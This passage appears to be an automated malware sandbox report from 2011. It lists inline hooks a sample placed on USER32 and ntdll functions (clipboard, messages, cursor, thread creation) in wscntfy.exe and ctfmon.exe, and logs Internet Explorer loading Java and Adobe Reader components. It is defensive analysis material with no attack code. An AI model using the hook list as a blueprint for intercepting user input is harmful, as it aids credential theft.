GetClipboardData INLINE 0xE9 0x9E 0xE4 0x43 0x35 0x56
OpenInputDesktop INLINE 0xE9 0x9A 0xA6 0x6A 0xAD 0xD6
PeekMessageA INLINE 0xE9 0x98 0x86 0x69 0x9A 0xA6
PeekMessageW INLINE 0xE9 0x90 0x00 0x0A 0xAB 0xB6
RegisterClassW INLINE 0xE9 0x92 0x21 0x1F 0xFA 0xA6
RegisterClassA INLINE 0xE9 0x9A 0xAA 0xAB 0xB3 0x36
GetWindowDC INLINE 0xE9 0x97 0x70 0x0F 0xFD 0xD6
ReleaseDC INLINE 0xE9 0x93 0x33 0x30 0x07 0x76
SetCapture INLINE 0xE9 0x9A 0xA4 0x47 0x78 0x86
DefMDIChildProcA INLINE 0xE9 0x9F 0xF3 0x3A 0xA2 0x26
DefMDIChildProcW INLINE 0xE9 0x91 0x1A 0xA9 0x92 0x26
DefFrameProcA INLINE 0xE9 0x9B 0xB3 0x3A 0xA2 0x26
DefFrameProcW INLINE 0xE9 0x99 0x9C 0xC9 0x93 0x36
RegisterClassExW INLINE 0xE9 0x9D 0xD6 0x6E 0xEE 0xE6
TranslateMessage INLINE 0xE9 0x93 0x3F 0xFB 0xB6 0x66
BeginPaint INLINE 0xE9 0x95 0x5E 0xEF 0xFC 0xC6
RegisterClassExA INLINE 0xE9 0x96 0x6E 0xE2 0x22 0x26
GetCursorPos INLINE 0xE9 0x93 0x30 0x0A 0xA4 0x46
GetMessagePos INLINE 0xE9 0x9E 0xE0 0x0A 0xA1 0x16
SwitchDesktop INLINE 0xE9 0x92 0x2B 0xB9 0x9C 0xC6
SetCursorPos INLINE 0xE9 0x91 0x12 0x2D 0xDA 0xA6
ReleaseCapture INLINE 0xE9 0x9E 0xE2 0x27 0x78 0x86
+ Process: wscntfy.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE1
LdrLoadDll INLINE 0xE9 0x90 0x09 0x91 0x1F 0xF1
NtCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE1
+ Process: ctfmon.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x94 0x47 0x7E 0xE5 0x5C
CallWindowProcA INLINE 0xE9 0x9B 0xB9 0x9F 0xF3 0x3C
CallWindowProcW INLINE 0xE9 0x9C 0xCF 0xFF 0xFC 0xCC
EndPaint INLINE 0xE9 0x9B 0xBA 0xAF 0xFC 0xCC
GetUpdateRgn INLINE 0xE9 0x9B 0xB7 0x79 0x98 0x8C
GetDCEx INLINE 0xE9 0x96 0x62 0x2C 0xC7 0x7C
GetCapture INLINE 0xE9 0x9D 0xD2 0x2A 0xA7 0x7D
DefWindowProcW INLINE 0xE9 0x99 0x97 0x70 0x0D 0xDD
GetMessageA INLINE 0xE9 0x94 0x48 0x8C 0xC6 0x6C
GetMessageW INLINE 0xE9 0x98 0x85 0x5A 0xAB 0xBD
DefDlgProcA INLINE 0xE9 0x91 0x12 0x2B 0xB6 0x6C
GetDC INLINE 0xE9 0x98 0x8B 0xB0 0x06 0x6D
DefDlgProcW INLINE 0xE9 0x90 0x09 0x95 0x5E 0xED
DefWindowProcA INLINE 0xE9 0x97 0x7F 0xFD 0xD9 0x9C
GetClipboardData INLINE 0xE9 0x9E 0xE4 0x43 0x35 0x5C
OpenInputDesktop INLINE 0xE9 0x9A 0xA6 0x6A 0xAD 0xDD
PeekMessageA INLINE 0xE9 0x98 0x86 0x69 0x9A 0xAC
PeekMessageW INLINE 0xE9 0x90 0x00 0x0A 0xAB 0xBD
RegisterClassW INLINE 0xE9 0x92 0x21 0x1F 0xFA 0xAD
RegisterClassA INLINE 0xE9 0x9A 0xAA 0xAB 0xB3 0x3C
GetWindowDC INLINE 0xE9 0x97 0x70 0x0F 0xFD 0xDD
ReleaseDC INLINE 0xE9 0x93 0x33 0x30 0x07 0x7D
SetCapture INLINE 0xE9 0x9A 0xA4 0x47 0x78 0x8C
DefMDIChildProcA INLINE 0xE9 0x9F 0xF3 0x3A 0xA2 0x2C
DefMDIChildProcW INLINE 0xE9 0x91 0x1A 0xA9 0x92 0x2C
DefFrameProcA INLINE 0xE9 0x9B 0xB3 0x3A 0xA2 0x2C
DefFrameProcW INLINE 0xE9 0x99 0x9C 0xC9 0x93 0x3C
RegisterClassExW INLINE 0xE9 0x9D 0xD6 0x6E 0xEE 0xED
TranslateMessage INLINE 0xE9 0x93 0x3F 0xFB 0xB6 0x6D
BeginPaint INLINE 0xE9 0x95 0x5E 0xEF 0xFC 0xCC
RegisterClassExA INLINE 0xE9 0x96 0x6E 0xE2 0x22 0x2D
GetCursorPos INLINE 0xE9 0x93 0x30 0x0A 0xA4 0x4C
GetMessagePos INLINE 0xE9 0x9E 0xE0 0x0A 0xA1 0x1C
SwitchDesktop INLINE 0xE9 0x92 0x2B 0xB9 0x9C 0xCD
SetCursorPos INLINE 0xE9 0x91 0x12 0x2D 0xDA 0xAC
ReleaseCapture INLINE 0xE9 0x9E 0xE2 0x27 0x78 0x8C
+ Process: ctfmon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE8
LdrLoadDll INLINE 0xE9 0x90 0x09 0x91 0x1F 0xF8
NtCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE8
Analysis File: iexplore.exe PID: 1712 Parent PID: -1
+ Sections
+ General
Start time: 05:43:09
Start date: 08/12/2011
Path: C:\Program Files\Internet Explorer\iexplore.exe
Commandline: not known
Imagebase: 0x400000
File size: 93184 bytes
MD5 hash: 55794B97A7FAABD2910873C85274F409
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 801A4FF
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
C:\WINDOWS\system32\jscript.dll write and read and execute commit 2340000 512000 own pid execute success or wait 1
C:\WINDOWS\system32\jscript.dll query and write and read and execute image 75C50000 512000 own pid read write success or wait 1
C:\WINDOWS\system32\mshtml.tlb query and read commit 3A60000 1351680 own pid readonly success or wait 1
C:\WINDOWS\system32\msxml3.dll write and read and execute commit 3BB0000 1175552 own pid execute success or wait 1
C:\WINDOWS\system32\msxml3.dll query and write and read and execute image 74980000 1191936 own pid read write success or wait 1
C:\WINDOWS\system32\msxml3r.dll write and read and execute commit 4080000 45056 own pid execute success or wait 1
C:\WINDOWS\system32\msxml3r.dll query and read commit 4080000 45056 own pid readonly success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll write and read and execute commit 4090000 139264 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll query and write and read and execute image 6D320000 143360 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll write and read and execute commit 41A0000 73728 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll query and write and read and execute image 6D590000 69632 own pid read write success or wait 1
\KnownDlls\OLEPRO32.DLL write and read and execute unknown 6D590000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\olepro32.dll query and write and read and execute image 5EDD0000 94208 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll write and read and execute commit 41A0000 98304 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll query and write and read and execute image 6D400000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 41A0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll write and read and execute commit 41B0000 81920 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll query and write and read and execute image 6D450000 98304 own pid read write success or wait 1
\KnownDlls\shfolder.dll write and read and execute unknown 6D450000 98304 own pid read write object name not found 1
C:\WINDOWS\system32\shfolder.dll query and write and read and execute image 76780000 36864 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll write and read and execute commit 41B0000 1527808 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll query and write and read and execute image 6D640000 1593344 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll write and read and execute commit 41C0000 36864 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll query and write and read and execute image 6D280000 32768 own pid read write success or wait 1
\BaseNamedObjects\hsperfdata_Administrator_1712 query and write and read commit 41C0000 65536 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll write and read and execute commit 41D0000 53248 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll query and write and read and execute image 6D610000 49152 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll write and read and execute commit 41D0000 122880 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll query and write and read and execute image 6D300000 118784 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll write and read and execute commit 41D0000 65536 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll query and write and read and execute image 6D630000 61440 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa query and read commit 2AA80000 5308416 own pid readonly success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa query and read commit 2B280000 5832704 own pid write copy success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa query and read commit 2BE80000 851968 own pid write copy success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\zip.dll write and read and execute commit 6A30000 65536 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\awt.dll write and read and execute commit 6E30000 1331200 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\awt.dll query and write and read and execute image 6D000000 1466368 own pid read write success or wait 1
\KnownDlls\ddraw.dll write and read and execute unknown 6D000000 1466368 own pid read write object name not found 1
C:\WINDOWS\system32\ddraw.dll query and write and read and execute image 73760000 307200 own pid read write success or wait 1
\KnownDlls\DCIMAN32.dll write and read and execute unknown 73760000 307200 own pid read write object name not found 1
C:\WINDOWS\system32\dciman32.dll query and write and read and execute image 73BC0000 24576 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll write and read and execute commit 6E30000 253952 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll query and write and read and execute image 6D240000 249856 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll write and read and execute commit 7130000 69632 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll query and write and read and execute image 6D1F0000 77824 own pid read write success or wait 1
\KnownDlls\shfolder.dll write and read and execute unknown 6D1F0000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\shfolder.dll query and write and read and execute image 76780000 36864 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll write and read and execute commit 7340000 122880 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll query and write and read and execute image 6D5D0000 118784 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll write and read and execute commit 7440000 86016 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll query and write and read and execute image 6D3E0000 81920 own pid read write success or wait 1
C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll write and read and execute commit 6F30000 634880 own pid execute success or wait 1
C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll query and write and read and execute image 6F30000 626688 own pid read write conflicting addresses 1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll query and write and read and execute image 7C420000 552960 own pid read write success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7830000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7830000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7830000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7830000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and write and read and execute and extend size image 7830000 344064 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 7830000 1208320 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7960000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7960000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7960000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7960000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7830000 344064 own pid readonly success or wait 1
C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll query and read commit 6FF0000 49152 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api write and read and execute commit 7830000 8658944 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api query and read commit 7830000 8658944 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api write and read and execute commit 7830000 8658944 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api query and read commit 7830000 8658944 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api write and read and execute commit 7830000 4124672 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api query and read commit 7830000 4124672 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api write and read and execute commit 7830000 4124672 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api query and read commit 7830000 4124672 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api write and read and execute commit 7830000 839680 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api query and read commit 7830000 839680 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api write and read and execute commit 7830000 839680 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api query and read commit 7830000 839680 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api write and read and execute commit 7830000 1150976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api query and read commit 7830000 1150976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api write and read and execute commit 7830000 1150976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api query and read commit 7830000 1150976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api write and read and execute commit 7830000 1417216 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api query and read commit 7830000 1417216 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api write and read and execute commit 7830000 1417216 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api query and read commit 7830000 1417216 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API write and read and execute commit 7830000 471040 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API query and read commit 7830000 471040 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API write and read and execute commit 7830000 471040 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API query and read commit 7830000 471040 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api write and read and execute commit 7830000 2035712 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api query and read commit 7830000 2035712 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api write and read and execute commit 7830000 2035712 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api query and read commit 7830000 2035712 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api write and read and execute commit 7830000 1347584 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api query and read commit 7830000 1347584 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api write and read and execute commit 7830000 1347584 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api query and read commit 7830000 1347584 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api write and read and execute commit 7830000 401408 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api query and read commit 7830000 401408 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api write and read and execute commit 7830000 401408 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api query and read commit 7830000 401408 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api write and read and execute commit 7830000 5771264 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api query and read commit 7830000 5771264 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api write and read and execute commit 7830000 5771264 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api query and read commit 7830000 5771264 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api write and read and execute commit 7000000 110592 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api query and read commit 7000000 110592 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api write and read and execute commit 7000000 110592 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api query and read commit 7000000 110592 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api write and read and execute commit 7830000 364544 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api query and read commit 7830000 364544 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api write and read and execute commit 7830000 364544 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api query and read commit 7830000 364544 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api write and read and execute commit 7830000 303104 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api query and read commit 7830000 303104 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api write and read and execute commit 7830000 303104 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api query and read commit 7830000 303104 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api write and read and execute commit 7830000 270336 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api query and read commit 7830000 270336 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api write and read and execute commit 7830000 270336 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api query and read commit 7830000 270336 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api write and read and execute commit 7000000 167936 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api query and read commit 7000000 167936 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api write and read and execute commit 7000000 167936 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api query and read commit 7000000 167936 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api write and read and execute commit 7000000 184320 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api query and read commit 7000000 184320 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api write and read and execute commit 7000000 184320 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api query and read commit 7000000 184320 own pid readonly success or wait 1
C:\Program Files\Common Files\System\msadc\msadco.dll write and read and execute commit 7000000 143360 own pid execute success or wait 1
C:\Program Files\Common Files\System\msadc\msadco.dll query and write and read and execute image 4DDF0000 143360 own pid read write success or wait 1
\KnownDlls\MSDART.DLL write and read and execute unknown 4DDF0000 143360 own pid read write object name not found 1
C:\WINDOWS\system32\msdart.dll query and write and read and execute image 765B0000 151552 own pid read write success or wait 1
\KnownDlls\comdlg32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
C:\Program Files\Common Files\System\msadc\msadco.dll query and read commit 7000000 65536 own pid readonly success or wait 1
C:\Program Files\Common Files\System\msadc\msadcor.dll write and read and execute commit 7010000 16384 own pid execute success or wait 1
C:\Program Files\Common Files\System\msadc\msadcor.dll query and write and read and execute image 7010000 16384 own pid read write conflicting addresses 1
\BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB..AJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.ABH query and write and read and execute and extend size unknown 7D30000 524288 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.B.AJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.C.AJGKK query and write and read commit 7DB0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.D.AJGKK query and write and read commit 7DC0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.E.PJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.F.PJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.G.PJGKK query and write and read commit 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.LB.PJGKK query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.MB.PJGKK query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.NB.PJGKK query and write and read and execute and extend size unknown 7020000 4096 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\net.dll write and read and execute commit 7DB0000 81920 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\net.dll query and write and read and execute image 6D4C0000 77824 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll write and read and execute commit 7FB0000 147456 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll query and write and read and execute image 6D1C0000 143360 own pid read write success or wait 1
